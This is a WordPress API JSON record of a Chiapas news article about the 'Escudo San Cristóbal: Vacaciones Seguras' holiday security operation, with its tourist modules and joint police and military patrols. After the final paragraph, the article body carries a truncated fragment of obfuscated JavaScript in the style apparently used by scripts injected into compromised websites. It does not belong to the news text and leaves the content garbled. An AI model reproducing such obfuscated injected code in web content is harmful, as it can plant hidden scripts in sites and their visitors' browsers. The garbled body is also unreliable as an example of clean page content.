{"id":22980,"date":"2025-07-17T04:33:55","date_gmt":"2025-07-17T04:33:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22980"},"modified":"2025-07-17T04:33:56","modified_gmt":"2025-07-17T04:33:56","slug":"refuerzan-seguridad-en-san-cristobal-con-operativo-escudo-san-cristobal-vacaciones-seguras","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22980","title":{"rendered":"Refuerzan seguridad en San Crist\u00f3bal con operativo \u201cEscudo San Crist\u00f3bal: Vacaciones Seguras"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"22981\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226511-1024x768.jpg\" alt=\"\" class=\"wp-image-22981\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226511-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226511-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226511-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226511.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"22982\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226512-768x1024.jpg\" alt=\"\" class=\"wp-image-22982\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226512-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226512-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226512.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"461\" data-id=\"22983\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226510-1024x461.jpg\" alt=\"\" class=\"wp-image-22983\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226510-1024x461.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226510-300x135.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226510-768x345.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000226510.jpg 1156w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>YolandaRodr\u00edguez\/ corresponsal<br>16 de julio del 2025. San Crist\u00f3bal de Las Casas.- Con el objetivo de brindar mayor seguridad y orientaci\u00f3n a visitantes y habitantes durante el periodo vacacional, el coordinador de Prevenci\u00f3n del Delito Municipal, Lic. Antonio de Jes\u00fas Villafuerte Ballinas, dio a conocer que, en coordinaci\u00f3n con los tres \u00f3rdenes de gobierno, se puso en marcha el operativo \u201cEscudo San Crist\u00f3bal: Vacaciones Seguras\u201d.<\/p>\n\n\n\n<p>Inform\u00f3 que, desde las 09:00 horas de este mi\u00e9rcoles, se instalaron tres m\u00f3dulos de atenci\u00f3n tur\u00edstica en puntos estrat\u00e9gicos: el centro hist\u00f3rico, la salida a Comit\u00e1n (San Pablo) y la salida a Tuxtla v\u00eda autopista (km 46), donde personal capacitado ofrece informaci\u00f3n y asistencia a turistas nacionales y extranjeros.<\/p>\n\n\n\n<p>Villafuerte Ballinas detall\u00f3 que, como parte del despliegue, tambi\u00e9n se realizaron recorridos de seguridad en los andadores del centro de la ciudad, en coordinaci\u00f3n con elementos de la Polic\u00eda Municipal, Tr\u00e1nsito Municipal, Protecci\u00f3n Civil, Guardia Estatal Preventiva, Fiscal\u00eda Zona Altos, Agencia de Investigaci\u00f3n e Inteligencia Ministerial, Guardia Nacional y la Secretar\u00eda de la Defensa Nacional (SEDENA).<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>YolandaRodr\u00edguez\/ corresponsal16 de julio del 2025. San Crist\u00f3bal de Las Casas.- Con el objetivo de brindar mayor seguridad y orientaci\u00f3n a visitantes y habitantes durante el periodo vacacional, el coordinador de Prevenci\u00f3n del Delito Municipal, Lic. Antonio de Jes\u00fas Villafuerte Ballinas, dio a conocer que, en coordinaci\u00f3n con los tres \u00f3rdenes de gobierno, se puso &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22982,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22980","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22980","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22980"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22980\/revisions"}],"predecessor-version":[{"id":22984,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22980\/revisions\/22984"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22982"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22980"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22980"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22980"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}